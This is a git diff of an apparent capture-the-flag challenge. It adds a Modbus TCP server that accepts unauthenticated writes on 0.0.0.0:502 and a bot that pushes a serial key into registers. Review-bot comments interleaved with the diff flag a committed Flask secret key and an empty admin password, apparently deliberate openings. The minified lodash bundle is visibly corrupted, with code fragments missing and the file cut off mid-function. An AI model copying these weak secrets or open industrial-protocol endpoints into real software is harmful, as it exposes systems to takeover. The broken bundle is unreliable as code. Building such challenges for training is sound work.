+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect(('127.0.0.1', 502))
+ message = tcp.read_coils(starting_address=7, quantity=1, slave_id=1)
+ out = tcp.send_message(message, sock)
+ if out[0]==1: #push serial key to the registers
+ open('app/.conf','w').write('')
+ if path.exists('app/.provision'):
+ message = tcp.write_multiple_registers(slave_id=1, starting_address=15, values=[44, 21, 90, 54, 76, 82, 11, 20, 37, 64])
+ tcp.send_message(message, sock)
+ sock.close()
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py
new file mode 100755
index 00000000..f40b6c18
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py
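Review bot: `rate()` indexes `session['granted']` directly, but that key is only set by `sess_init()` from `index()` or by a successful POST to `/access`, so a client whose first authenticated request is `/rate` hits a KeyError and gets a 500; `if session.get('granted', False):` avoids that. `app.secret_key = '45de23-dc231-54569-342da'` is committed in source, and because Flask's default session is a signed client-side cookie, the `granted` flag is only as trustworthy as that key is secret, so the deployed key should come from an environment variable or a file outside the repository. `generate_password_hash("")` leaves the `admin` account with an empty password in this copy, which should be confirmed as a placeholder rather than the deployed value. In `provision()`, `open('/app/.provision','w').write('')` never closes the handle; `open('/app/.provision', 'w').close()` creates the same empty file without relying on garbage collection.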
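Review bot: The marker files are addressed as `app/.conf` and `app/.provision`, relative to the working directory, while app.py in this commit checks `/app/.conf` and `/app/.provision`, so the two processes only agree when the bot is started with `/` as its working directory; supervisord.conf is not visible here, so that should be confirmed. Using the absolute paths (`open('/app/.conf', 'w').close()` and `path.exists('/app/.provision')`) removes the dependency. Inside the loop the socket is closed only on the success path, so an exception from `connect` or `send_message` leaks the descriptor and ends the process; `with socket.create_connection(('127.0.0.1', 502)) as sock:` closes it in every case.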
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+import logging
+import json
+from time import sleep
+from socketserver import TCPServer
+from collections import defaultdict
+from umodbus import conf
+from umodbus.server.tcp import RequestHandler, get_server
+from umodbus.utils import log_to_stream
+
+log_to_stream(level=logging.ERROR)
+data_store = defaultdict(int)
+conf.SIGNED_VALUES = True
+TCPServer.allow_reuse_address = True
+app = get_server(TCPServer, ('0.0.0.0', 502), RequestHandler)
+
+@app.route(slave_ids=[1], function_codes=[1,2,3,4], addresses=list(range(1, 30)))
+def read_data_store(slave_id, function_code, address):
+ return data_store[address]
+
+@app.route(slave_ids=[1], function_codes=[5,6,15,16], addresses=list(range(1, 30)))
+def write_data_store(slave_id, function_code, address, value):
+ data_store[address] = value
+
+if __name__ == '__main__':
+ try:
+ app.serve_forever()
+ finally:
+ app.shutdown()
+ app.server_close()
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png
new file mode 100644
index 00000000..87d3ec57
Binary files /dev/null and b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png differ
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js
new file mode 100644
index 00000000..f5cd8897
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js
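Review bot: Both handlers index `data_store` by `address` alone and ignore `function_code`, so coils, discrete inputs, holding registers and input registers all share one slot per address, and a value stored through one table is returned when the same address is read through another. Modbus keeps those four tables separate, and bot.py in this commit uses coils and registers for different purposes, so the store should be keyed by table as well as address, as sketched below. `import json` and `from time import sleep` are unused and can be dropped. The listener binds `0.0.0.0:502` with write function codes enabled and Modbus has no authentication of its own, so if that exposure is not intended it has to be limited at the network level.

```python
# … unchanged: imports, logging setup, get_server call …

# Map each Modbus function code to the table it addresses, so the four
# tables no longer share one slot per address.
TABLE_FOR_FUNCTION = {
    1: 'coils', 5: 'coils', 15: 'coils',
    2: 'discrete_inputs',
    3: 'holding_registers', 6: 'holding_registers', 16: 'holding_registers',
    4: 'input_registers',
}

@app.route(slave_ids=[1], function_codes=[1,2,3,4], addresses=list(range(1, 30)))
def read_data_store(slave_id, function_code, address):
    return data_store[(TABLE_FOR_FUNCTION[function_code], address)]

@app.route(slave_ids=[1], function_codes=[5,6,15,16], addresses=list(range(1, 30)))
def write_data_store(slave_id, function_code, address, value):
    data_store[(TABLE_FOR_FUNCTION[function_code], address)] = value

# … unchanged: __main__ serve_forever / shutdown block …
```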
@@ -0,0 +1,10 @@ +!function(t,n){"object"==typeof exports&&"object"==typeof module?module.exports=n():"function"==typeof define&&define.amd?define([],n):"object"==typeof exports?exports.LCD=n():t.LCD=n()}(window,(function(){return function(t){var n={};function r(e){if(n[e])return n[e].exports;var u=n[e]={i:e,l:!1,exports:{}};return t[e].call(u.exports,u,u.exports,r),u.l=!0,u.exports}return r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t.__esModule)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var u in t)r.d(e,u,function(n){return t[n]}.bind(null,u));return e},r.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="./",r(r.s=7)}([function(t,n,r){(function(t,e){var u; +/** + * @license + * Lodash + * Copyright OpenJS Foundation and other contributors + * Released under MIT license + * Based on Underscore.js 1.8.3 + * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors + */(function(){var i,o=200,a="Unsupported core-js use. 
Try https://npms.io/search?q=ponyfill.",c="Expected a function",f="__lodash_hash_undefined__",s=500,l="__lodash_placeholder__",h=1,p=2,v=4,_=1,g=2,d=1,y=2,w=4,b=8,m=16,x=32,j=64,k=128,S=256,A=512,z=30,C="...",I=800,O=16,E=1,R=2,L=1/0,B=9007199254740991,T=17976931348623157e292,W=NaN,M=4294967295,P=M-1,U=M>>>1,D=[["ary",k],["bind",d],["bindKey",y],["curry",b],["curryRight",m],["flip",A],["partial",x],["partialRight",j],["rearg",S]],N="[object Arguments]",$="[object Array]",F="[object AsyncFunction]",q="[object Boolean]",G="[object Date]",V="[object DOMException]",Z="[object Error]",K="[object Function]",H="[object GeneratorFunction]",J="[object Map]",Y="[object Number]",Q="[object Null]",X="[object Object]",tt="[object Proxy]",nt="[object RegExp]",rt="[object Set]",et="[object String]",ut="[object Symbol]",it="[object Undefined]",ot="[object WeakMap]",at="[object WeakSet]",ct="[object ArrayBuffer]",ft="[object DataView]",st="[object Float32Array]",lt="[object Float64Array]",ht="[object Int8Array]",pt="[object Int16Array]",vt="[object Int32Array]",_t="[object Uint8Array]",gt="[object Uint8ClampedArray]",dt="[object Uint16Array]",yt="[object Uint32Array]",wt=/\b__p \+= '';/g,bt=/\b(__p \+=) '' \+/g,mt=/(__e\(.*?\)|\b__t\)) \+\n'';/g,xt=/&(?:amp|lt|gt|quot|#39);/g,jt=/[&<>"']/g,kt=RegExp(xt.source),St=RegExp(jt.source),At=/<%-([\s\S]+?)%>/g,zt=/<%([\s\S]+?)%>/g,Ct=/<%=([\s\S]+?)%>/g,It=/\.|\[(?:[^[\]]*|(["'])(?:(?!\1)[^\\]|\\.)*?\1)\]/,Ot=/^\w*$/,Et=/[^.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|$))/g,Rt=/[\\^$.*+?()[\]{}|]/g,Lt=RegExp(Rt.source),Bt=/^\s+|\s+$/g,Tt=/^\s+/,Wt=/\s+$/,Mt=/\{(?:\n\/\* \[wrapped with .+\] \*\/)?\n?/,Pt=/\{\n\/\* \[wrapped with (.+)\] \*/,Ut=/,? 
& /,Dt=/[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g,Nt=/\\(\\)?/g,$t=/\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g,Ft=/\w*$/,qt=/^[-+]0x[0-9a-f]+$/i,Gt=/^0b[01]+$/i,Vt=/^\[object .+?Constructor\]$/,Zt=/^0o[0-7]+$/i,Kt=/^(?:0|[1-9]\d*)$/,Ht=/[\xc0-\xd6\xd8-\xf6\xf8-\xff\u0100-\u017f]/g,Jt=/($^)/,Yt=/['\n\r\u2028\u2029\\]/g,Qt="\\u0300-\\u036f\\ufe20-\\ufe2f\\u20d0-\\u20ff",Xt="\\xac\\xb1\\xd7\\xf7\\x00-\\x2f\\x3a-\\x40\\x5b-\\x60\\x7b-\\xbf\\u2000-\\u206f \\t\\x0b\\f\\xa0\\ufeff\\n\\r\\u2028\\u2029\\u1680\\u180e\\u2000\\u2001\\u2002\\u2003\\u2004\\u2005\\u2006\\u2007\\u2008\\u2009\\u200a\\u202f\\u205f\\u3000",tn="[\\ud800-\\udfff]",nn="["+Xt+"]",rn="["+Qt+"]",en="\\d+",un="[\\u2700-\\u27bf]",on="[a-z\\xdf-\\xf6\\xf8-\\xff]",an="[^\\ud800-\\udfff"+Xt+en+"\\u2700-\\u27bfa-z\\xdf-\\xf6\\xf8-\\xffA-Z\\xc0-\\xd6\\xd8-\\xde]",cn="\\ud83c[\\udffb-\\udfff]",fn="[^\\ud800-\\udfff]",sn="(?:\\ud83c[\\udde6-\\uddff]){2}",ln="[\\ud800-\\udbff][\\udc00-\\udfff]",hn="[A-Z\\xc0-\\xd6\\xd8-\\xde]",pn="(?:"+on+"|"+an+")",vn="(?:"+hn+"|"+an+")",_n="(?:"+rn+"|"+cn+")"+"?",gn="[\\ufe0e\\ufe0f]?"+_n+("(?:\\u200d(?:"+[fn,sn,ln].join("|")+")[\\ufe0e\\ufe0f]?"+_n+")*"),dn="(?:"+[un,sn,ln].join("|")+")"+gn,yn="(?:"+[fn+rn+"?",rn,sn,ln,tn].join("|")+")",wn=RegExp("['’]","g"),bn=RegExp(rn,"g"),mn=RegExp(cn+"(?="+cn+")|"+yn+gn,"g"),xn=RegExp([hn+"?"+on+"+(?:['’](?:d|ll|m|re|s|t|ve))?(?="+[nn,hn,"$"].join("|")+")",vn+"+(?:['’](?:D|LL|M|RE|S|T|VE))?(?="+[nn,hn+pn,"$"].join("|")+")",hn+"?"+pn+"+(?:['’](?:d|ll|m|re|s|t|ve))?",hn+"+(?:['’](?:D|LL|M|RE|S|T|VE))?","\\d*(?:1ST|2ND|3RD|(?![123])\\dTH)(?=\\b|[a-z_])","\\d*(?:1st|2nd|3rd|(?![123])\\dth)(?=\\b|[A-Z_])",en,dn].join("|"),"g"),jn=RegExp("[\\u200d\\ud800-\\udfff"+Qt+"\\ufe0e\\ufe0f]"),kn=/[a-z][A-Z]|[A-Z]{2}[a-z]|[0-9][a-zA-Z]|[a-zA-Z][0-9]|[^a-zA-Z0-9 
]/,Sn=["Array","Buffer","DataView","Date","Error","Float32Array","Float64Array","Function","Int8Array","Int16Array","Int32Array","Map","Math","Object","Promise","RegExp","Set","String","Symbol","TypeError","Uint8Array","Uint8ClampedArray","Uint16Array","Uint32Array","WeakMap","_","clearTimeout","isFinite","parseInt","setTimeout"],An=-1,zn={};zn[st]=zn[lt]=zn[ht]=zn[pt]=zn[vt]=zn[_t]=zn[gt]=zn[dt]=zn[yt]=!0,zn[N]=zn[$]=zn[ct]=zn[q]=zn[ft]=zn[G]=zn[Z]=zn[K]=zn[J]=zn[Y]=zn[X]=zn[nt]=zn[rt]=zn[et]=zn[ot]=!1;var Cn={};Cn[N]=Cn[$]=Cn[ct]=Cn[ft]=Cn[q]=Cn[G]=Cn[st]=Cn[lt]=Cn[ht]=Cn[pt]=Cn[vt]=Cn[J]=Cn[Y]=Cn[X]=Cn[nt]=Cn[rt]=Cn[et]=Cn[ut]=Cn[_t]=Cn[gt]=Cn[dt]=Cn[yt]=!0,Cn[Z]=Cn[K]=Cn[ot]=!1;var In={"\\":"\\","'":"'","\n":"n","\r":"r","\u2028":"u2028","\u2029":"u2029"},On=parseFloat,En=parseInt,Rn="object"==typeof t&&t&&t.Object===Object&&t,Ln="object"==typeof self&&self&&self.Object===Object&&self,Bn=Rn||Ln||Function("return this")(),Tn=n&&!n.nodeType&&n,Wn=Tn&&"object"==typeof e&&e&&!e.nodeType&&e,Mn=Wn&&Wn.exports===Tn,Pn=Mn&&Rn.process,Un=function(){try{var t=Wn&&Wn.require&&Wn.require("util").types;return t||Pn&&Pn.binding&&Pn.binding("util")}catch(t){}}(),Dn=Un&&Un.isArrayBuffer,Nn=Un&&Un.isDate,$n=Un&&Un.isMap,Fn=Un&&Un.isRegExp,qn=Un&&Un.isSet,Gn=Un&&Un.isTypedArray;function Vn(t,n,r){switch(r.length){case 0:return t.call(n);case 1:return t.call(n,r[0]);case 2:return t.call(n,r[0],r[1]);case 3:return t.call(n,r[0],r[1],r[2])}return t.apply(n,r)}function Zn(t,n,r,e){for(var u=-1,i=null==t?0:t.length;++u-1}function Xn(t,n,r){for(var e=-1,u=null==t?0:t.length;++e-1;);return r}function mr(t,n){for(var r=t.length;r--&&cr(n,t[r],0)>-1;);return r}var 
xr=pr({"À":"A","Á":"A","Â":"A","Ã":"A","Ä":"A","Å":"A","à":"a","á":"a","â":"a","ã":"a","ä":"a","å":"a","Ç":"C","ç":"c","Ð":"D","ð":"d","È":"E","É":"E","Ê":"E","Ë":"E","è":"e","é":"e","ê":"e","ë":"e","Ì":"I","Í":"I","Î":"I","Ï":"I","ì":"i","í":"i","î":"i","ï":"i","Ñ":"N","ñ":"n","Ò":"O","Ó":"O","Ô":"O","Õ":"O","Ö":"O","Ø":"O","ò":"o","ó":"o","ô":"o","õ":"o","ö":"o","ø":"o","Ù":"U","Ú":"U","Û":"U","Ü":"U","ù":"u","ú":"u","û":"u","ü":"u","Ý":"Y","ý":"y","ÿ":"y","Æ":"Ae","æ":"ae","Þ":"Th","þ":"th","ß":"ss","Ā":"A","Ă":"A","Ą":"A","ā":"a","ă":"a","ą":"a","Ć":"C","Ĉ":"C","Ċ":"C","Č":"C","ć":"c","ĉ":"c","ċ":"c","č":"c","Ď":"D","Đ":"D","ď":"d","đ":"d","Ē":"E","Ĕ":"E","Ė":"E","Ę":"E","Ě":"E","ē":"e","ĕ":"e","ė":"e","ę":"e","ě":"e","Ĝ":"G","Ğ":"G","Ġ":"G","Ģ":"G","ĝ":"g","ğ":"g","ġ":"g","ģ":"g","Ĥ":"H","Ħ":"H","ĥ":"h","ħ":"h","Ĩ":"I","Ī":"I","Ĭ":"I","Į":"I","İ":"I","ĩ":"i","ī":"i","ĭ":"i","į":"i","ı":"i","Ĵ":"J","ĵ":"j","Ķ":"K","ķ":"k","ĸ":"k","Ĺ":"L","Ļ":"L","Ľ":"L","Ŀ":"L","Ł":"L","ĺ":"l","ļ":"l","ľ":"l","ŀ":"l","ł":"l","Ń":"N","Ņ":"N","Ň":"N","Ŋ":"N","ń":"n","ņ":"n","ň":"n","ŋ":"n","Ō":"O","Ŏ":"O","Ő":"O","ō":"o","ŏ":"o","ő":"o","Ŕ":"R","Ŗ":"R","Ř":"R","ŕ":"r","ŗ":"r","ř":"r","Ś":"S","Ŝ":"S","Ş":"S","Š":"S","ś":"s","ŝ":"s","ş":"s","š":"s","Ţ":"T","Ť":"T","Ŧ":"T","ţ":"t","ť":"t","ŧ":"t","Ũ":"U","Ū":"U","Ŭ":"U","Ů":"U","Ű":"U","Ų":"U","ũ":"u","ū":"u","ŭ":"u","ů":"u","ű":"u","ų":"u","Ŵ":"W","ŵ":"w","Ŷ":"Y","ŷ":"y","Ÿ":"Y","Ź":"Z","Ż":"Z","Ž":"Z","ź":"z","ż":"z","ž":"z","IJ":"IJ","ij":"ij","Œ":"Oe","œ":"oe","ʼn":"'n","ſ":"s"}),jr=pr({"&":"&","<":"<",">":">",'"':""","'":"'"});function kr(t){return"\\"+In[t]}function Sr(t){return jn.test(t)}function Ar(t){var n=-1,r=Array(t.size);return t.forEach((function(t,e){r[++n]=[e,t]})),r}function zr(t,n){return function(r){return t(n(r))}}function Cr(t,n){for(var r=-1,e=t.length,u=0,i=[];++r",""":'"',"'":"'"});var Br=function t(n){var 
r,e=(n=null==n?Bn:Br.defaults(Bn.Object(),n,Br.pick(Bn,Sn))).Array,u=n.Date,Qt=n.Error,Xt=n.Function,tn=n.Math,nn=n.Object,rn=n.RegExp,en=n.String,un=n.TypeError,on=e.prototype,an=Xt.prototype,cn=nn.prototype,fn=n["__core-js_shared__"],sn=an.toString,ln=cn.hasOwnProperty,hn=0,pn=(r=/[^.]+$/.exec(fn&&fn.keys&&fn.keys.IE_PROTO||""))?"Symbol(src)_1."+r:"",vn=cn.toString,_n=sn.call(nn),gn=Bn._,dn=rn("^"+sn.call(ln).replace(Rt,"\\$&").replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g,"$1.*?")+"$"),yn=Mn?n.Buffer:i,mn=n.Symbol,jn=n.Uint8Array,In=yn?yn.allocUnsafe:i,Rn=zr(nn.getPrototypeOf,nn),Ln=nn.create,Tn=cn.propertyIsEnumerable,Wn=on.splice,Pn=mn?mn.isConcatSpreadable:i,Un=mn?mn.iterator:i,ir=mn?mn.toStringTag:i,pr=function(){try{var t=Pi(nn,"defineProperty");return t({},"",{}),t}catch(t){}}(),Tr=n.clearTimeout!==Bn.clearTimeout&&n.clearTimeout,Wr=u&&u.now!==Bn.Date.now&&u.now,Mr=n.setTimeout!==Bn.setTimeout&&n.setTimeout,Pr=tn.ceil,Ur=tn.floor,Dr=nn.getOwnPropertySymbols,Nr=yn?yn.isBuffer:i,$r=n.isFinite,Fr=on.join,qr=zr(nn.keys,nn),Gr=tn.max,Vr=tn.min,Zr=u.now,Kr=n.parseInt,Hr=tn.random,Jr=on.reverse,Yr=Pi(n,"DataView"),Qr=Pi(n,"Map"),Xr=Pi(n,"Promise"),te=Pi(n,"Set"),ne=Pi(n,"WeakMap"),re=Pi(nn,"create"),ee=ne&&new ne,ue={},ie=so(Yr),oe=so(Qr),ae=so(Xr),ce=so(te),fe=so(ne),se=mn?mn.prototype:i,le=se?se.valueOf:i,he=se?se.toString:i;function pe(t){if(Ca(t)&&!da(t)&&!(t instanceof de)){if(t instanceof ge)return t;if(ln.call(t,"__wrapped__"))return lo(t)}return new ge(t)}var ve=function(){function t(){}return function(n){if(!za(n))return{};if(Ln)return Ln(n);t.prototype=n;var r=new t;return t.prototype=i,r}}();function _e(){}function ge(t,n){this.__wrapped__=t,this.__actions__=[],this.__chain__=!!n,this.__index__=0,this.__values__=i}function de(t){this.__wrapped__=t,this.__actions__=[],this.__dir__=1,this.__filtered__=!1,this.__iteratees__=[],this.__takeCount__=M,this.__views__=[]}function ye(t){var 
n=-1,r=null==t?0:t.length;for(this.clear();++n=n?t:n)),t}function Te(t,n,r,e,u,o){var a,c=n&h,f=n&p,s=n&v;if(r&&(a=u?r(t,e,u,o):r(t)),a!==i)return a;if(!za(t))return t;var l=da(t);if(l){if(a=function(t){var n=t.length,r=new t.constructor(n);n&&"string"==typeof t[0]&&ln.call(t,"index")&&(r.index=t.index,r.input=t.input);return r}(t),!c)return ri(t,a)}else{var _=Ni(t),g=_==K||_==H;if(ma(t))return Ju(t,c);if(_==X||_==N||g&&!u){if(a=f||g?{}:Fi(t),!c)return f?function(t,n){return ei(t,Di(t),n)}(t,function(t,n){return t&&ei(n,ic(n),t)}(a,t)):function(t,n){return ei(t,Ui(t),n)}(t,Ee(a,t))}else{if(!Cn[_])return u?t:{};a=function(t,n,r){var e=t.constructor;switch(n){case ct:return Yu(t);case q:case G:return new e(+t);case ft:return function(t,n){var r=n?Yu(t.buffer):t.buffer;return new t.constructor(r,t.byteOffset,t.byteLength)}(t,r);case st:case lt:case ht:case pt:case vt:case _t:case gt:case dt:case yt:return Qu(t,r);case J:return new e;case Y:case et:return new e(t);case nt:return function(t){var n=new t.constructor(t.source,Ft.exec(t));return n.lastIndex=t.lastIndex,n}(t);case rt:return new e;case ut:return u=t,le?nn(le.call(u)):{}}var u}(t,_,c)}}o||(o=new xe);var d=o.get(t);if(d)return d;o.set(t,a),La(t)?t.forEach((function(e){a.add(Te(e,n,r,e,t,o))})):Ia(t)&&t.forEach((function(e,u){a.set(u,Te(e,n,r,u,t,o))}));var y=l?i:(s?f?Ei:Oi:f?ic:uc)(t);return Kn(y||t,(function(e,u){y&&(e=t[u=e]),Ce(a,u,Te(e,n,r,u,t,o))})),a}function We(t,n,r){var e=r.length;if(null==t)return!e;for(t=nn(t);e--;){var u=r[e],o=n[u],a=t[u];if(a===i&&!(u in t)||!o(a))return!1}return!0}function Me(t,n,r){if("function"!=typeof t)throw new un(c);return eo((function(){t.apply(i,r)}),n)}function Pe(t,n,r,e){var u=-1,i=Qn,a=!0,c=t.length,f=[],s=n.length;if(!c)return f;r&&(n=tr(n,dr(r))),e?(i=Xn,a=!1):n.length>=o&&(i=wr,a=!1,n=new me(n));t:for(;++u-1},we.prototype.set=function(t,n){var r=this.__data__,e=Ie(r,t);return 
e<0?(++this.size,r.push([t,n])):r[e][1]=n,this},be.prototype.clear=function(){this.size=0,this.__data__={hash:new ye,map:new(Qr||we),string:new ye}},be.prototype.delete=function(t){var n=Wi(this,t).delete(t);return this.size-=n?1:0,n},be.prototype.get=function(t){return Wi(this,t).get(t)},be.prototype.has=function(t){return Wi(this,t).has(t)},be.prototype.set=function(t,n){var r=Wi(this,t),e=r.size;return r.set(t,n),this.size+=r.size==e?0:1,this},me.prototype.add=me.prototype.push=function(t){return this.__data__.set(t,f),this},me.prototype.has=function(t){return this.__data__.has(t)},xe.prototype.clear=function(){this.__data__=new we,this.size=0},xe.prototype.delete=function(t){var n=this.__data__,r=n.delete(t);return this.size=n.size,r},xe.prototype.get=function(t){return this.__data__.get(t)},xe.prototype.has=function(t){return this.__data__.has(t)},xe.prototype.set=function(t,n){var r=this.__data__;if(r instanceof we){var e=r.__data__;if(!Qr||e.length0&&r(a)?n>1?qe(a,n-1,r,e,u):nr(u,a):e||(u[u.length]=a)}return u}var Ge=ai(),Ve=ai(!0);function Ze(t,n){return t&&Ge(t,n,uc)}function Ke(t,n){return t&&Ve(t,n,uc)}function He(t,n){return Yn(n,(function(n){return ka(t[n])}))}function Je(t,n){for(var r=0,e=(n=Vu(n,t)).length;null!=t&&rn}function tu(t,n){return null!=t&&ln.call(t,n)}function nu(t,n){return null!=t&&n in nn(t)}function ru(t,n,r){for(var u=r?Xn:Qn,o=t[0].length,a=t.length,c=a,f=e(a),s=1/0,l=[];c--;){var h=t[c];c&&n&&(h=tr(h,dr(n))),s=Vr(h.length,s),f[c]=!r&&(n||o>=120&&h.length>=120)?new me(c&&h):i}h=t[0];var p=-1,v=f[0];t:for(;++p=a)return c;var f=r[e];return c*("desc"==f?-1:1)}}return t.index-n.index}(t,n,r)}))}function yu(t,n,r){for(var e=-1,u=n.length,i={};++e-1;)a!==t&&Wn.call(a,c,1),Wn.call(t,c,1);return t}function bu(t,n){for(var r=t?n.length:0,e=r-1;r--;){var u=n[r];if(r==e||u!==i){var i=u;Gi(u)?Wn.call(t,u,1):Pu(t,u)}}return t}function mu(t,n){return t+Ur(Hr()*(n-t+1))}function xu(t,n){var r="";if(!t||n<1||n>B)return 
r;do{n%2&&(r+=t),(n=Ur(n/2))&&(t+=t)}while(n);return r}function ju(t,n){return uo(Xi(t,n,Oc),t+"")}function ku(t){return ke(pc(t))}function Su(t,n){var r=pc(t);return ao(r,Be(n,0,r.length))}function Au(t,n,r,e){if(!za(t))return t;for(var u=-1,o=(n=Vu(n,t)).length,a=o-1,c=t;null!=c&&++ui?0:i+n),(r=r>i?i:r)<0&&(r+=i),i=n>r?0:r-n>>>0,n>>>=0;for(var o=e(i);++u>>1,o=t[i];null!==o&&!Ta(o)&&(r?o<=n:o=o){var s=n?null:xi(t);if(s)return Ir(s);a=!1,u=wr,f=new me}else f=n?[]:c;t:for(;++e=e?t:Ou(t,n,r)}var Hu=Tr||function(t){return Bn.clearTimeout(t)};function Ju(t,n){if(n)return t.slice();var r=t.length,e=In?In(r):new t.constructor(r);return t.copy(e),e}function Yu(t){var n=new t.constructor(t.byteLength);return new jn(n).set(new jn(t)),n}function Qu(t,n){var r=n?Yu(t.buffer):t.buffer;return new t.constructor(r,t.byteOffset,t.length)}function Xu(t,n){if(t!==n){var r=t!==i,e=null===t,u=t==t,o=Ta(t),a=n!==i,c=null===n,f=n==n,s=Ta(n);if(!c&&!s&&!o&&t>n||o&&a&&f&&!c&&!s||e&&a&&f||!r&&f||!u)return 1;if(!e&&!o&&!s&&t1?r[u-1]:i,a=u>2?r[2]:i;for(o=t.length>3&&"function"==typeof o?(u--,o):i,a&&Vi(r[0],r[1],a)&&(o=u<3?i:o,u=1),n=nn(n);++e-1?u[o?n[a]:a]:i}}function hi(t){return Ii((function(n){var r=n.length,e=r,u=ge.prototype.thru;for(t&&n.reverse();e--;){var o=n[e];if("function"!=typeof o)throw new un(c);if(u&&!a&&"wrapper"==Li(o))var a=new ge([],!0)}for(e=a?e:r;++e1&&b.reverse(),h&&sc))return!1;var s=o.get(t);if(s&&o.get(n))return s==n;var l=-1,h=!0,p=r&g?new me:i;for(o.set(t,n),o.set(n,t);++l-1&&t%1==0&&t1?"& ":"")+n[e],n=n.join(r>2?", ":" "),t.replace(Mt,"{\n/* [wrapped with "+n+"] */\n")}(e,function(t,n){return Kn(D,(function(r){var e="_."+r[0];n&r[1]&&!Qn(t,e)&&t.push(e)})),t.sort()}(function(t){var n=t.match(Pt);return n?n[1].split(Ut):[]}(e),r)))}function oo(t){var n=0,r=0;return function(){var e=Zr(),u=O-(e-r);if(r=e,u>0){if(++n>=I)return arguments[0]}else n=0;return t.apply(i,arguments)}}function ao(t,n){var r=-1,e=t.length,u=e-1;for(n=n===i?e:n;++r1?t[n-1]:i;return 
r="function"==typeof r?(t.pop(),r):i,Ro(t,r)}));function Uo(t){var n=pe(t);return n.__chain__=!0,n}function Do(t,n){return n(t)}var No=Ii((function(t){var n=t.length,r=n?t[0]:0,e=this.__wrapped__,u=function(n){return Le(n,t)};return!(n>1||this.__actions__.length)&&e instanceof de&&Gi(r)?((e=e.slice(r,+r+(n?1:0))).__actions__.push({func:Do,args:[u],thisArg:i}),new ge(e,this.__chain__).thru((function(t){return n&&!t.length&&t.push(i),t}))):this.thru(u)}));var $o=ui((function(t,n,r){ln.call(t,r)?++t[r]:Re(t,r,1)}));var Fo=li(_o),qo=li(go);function Go(t,n){return(da(t)?Kn:Ue)(t,Ti(n,3))}function Vo(t,n){return(da(t)?Hn:De)(t,Ti(n,3))}var Zo=ui((function(t,n,r){ln.call(t,r)?t[r].push(n):Re(t,r,[n])}));var Ko=ju((function(t,n,r){var u=-1,i="function"==typeof n,o=wa(t)?e(t.length):[];return Ue(t,(function(t){o[++u]=i?Vn(n,t,r):eu(t,n,r)})),o})),Ho=ui((function(t,n,r){Re(t,r,n)}));function Jo(t,n){return(da(t)?tr:hu)(t,Ti(n,3))}var Yo=ui((function(t,n,r){t[r?0:1].push(n)}),(function(){return[[],[]]}));var Qo=ju((function(t,n){if(null==t)return[];var r=n.length;return r>1&&Vi(t,n[0],n[1])?n=[]:r>2&&Vi(n[0],n[1],n[2])&&(n=[n[0]]),du(t,qe(n,1),[])})),Xo=Wr||function(){return Bn.Date.now()};function ta(t,n,r){return n=r?i:n,n=t&&null==n?t.length:n,ki(t,k,i,i,i,i,n)}function na(t,n){var r;if("function"!=typeof n)throw new un(c);return t=Na(t),function(){return--t>0&&(r=n.apply(this,arguments)),t<=1&&(n=i),r}}var ra=ju((function(t,n,r){var e=d;if(r.length){var u=Cr(r,Bi(ra));e|=x}return ki(t,e,n,r,u)})),ea=ju((function(t,n,r){var e=d|y;if(r.length){var u=Cr(r,Bi(ea));e|=x}return ki(n,e,t,r,u)}));function ua(t,n,r){var e,u,o,a,f,s,l=0,h=!1,p=!1,v=!0;if("function"!=typeof t)throw new un(c);function _(n){var r=e,o=u;return e=u=i,l=n,a=t.apply(o,r)}function g(t){var r=t-s;return s===i||r>=n||r<0||p&&t-l>=o}function d(){var t=Xo();if(g(t))return y(t);f=eo(d,function(t){var r=n-(t-s);return p?Vr(r,o-(t-l)):r}(t))}function y(t){return f=i,v&&e?_(t):(e=u=i,a)}function w(){var 
t=Xo(),r=g(t);if(e=arguments,u=this,s=t,r){if(f===i)return function(t){return l=t,f=eo(d,n),h?_(t):a}(s);if(p)return Hu(f),f=eo(d,n),_(s)}return f===i&&(f=eo(d,n)),a}return n=Fa(n)||0,za(r)&&(h=!!r.leading,o=(p="maxWait"in r)?Gr(Fa(r.maxWait)||0,n):o,v="trailing"in r?!!r.trailing:v),w.cancel=function(){f!==i&&Hu(f),l=0,e=s=u=f=i},w.flush=function(){return f===i?a:y(Xo())},w}var ia=ju((function(t,n){return Me(t,1,n)})),oa=ju((function(t,n,r){return Me(t,Fa(n)||0,r)}));function aa(t,n){if("function"!=typeof t||null!=n&&"function"!=typeof n)throw new un(c);var r=function(){var e=arguments,u=n?n.apply(this,e):e[0],i=r.cache;if(i.has(u))return i.get(u);var o=t.apply(this,e);return r.cache=i.set(u,o)||i,o};return r.cache=new(aa.Cache||be),r}function ca(t){if("function"!=typeof t)throw new un(c);return function(){var n=arguments;switch(n.length){case 0:return!t.call(this);case 1:return!t.call(this,n[0]);case 